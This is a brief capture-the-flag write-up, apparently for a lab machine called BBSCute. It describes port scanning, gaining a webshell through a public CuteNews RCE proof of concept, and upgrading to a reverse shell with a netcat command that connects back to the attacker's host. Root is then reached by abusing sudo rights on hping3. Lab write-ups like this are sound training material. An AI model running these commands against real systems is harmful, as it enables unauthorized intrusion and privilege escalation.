🐧BBSCute

192.168.105.128

Enumeration

Nmap scan

nmap 192.168.105.128 -p- -sV -T4 -A

Port 22

Port 80

Dirbuster found lots of directories. Got the service and version number. This specific version does have RCE exploits available.

Shell

Using the exploit from https://github.com/dinesh876/CVE-2019-11447-POC and creating a normal using account I was able to get a shell. Had to find the captcha.php to get the account registered.

Had the server connect back to me as the previous shell was just a webshell.

nc -c bash 192.168.49.105 6666

Sudo perms.

This was a little hard to get right for escalation using https://gtfobins.github.io/gtfobins/hping3/

Using hping3 puts you in hping3 at a prompt then use /bin/sh -p and bamm you're root.

Root

Last updated

Was this helpful?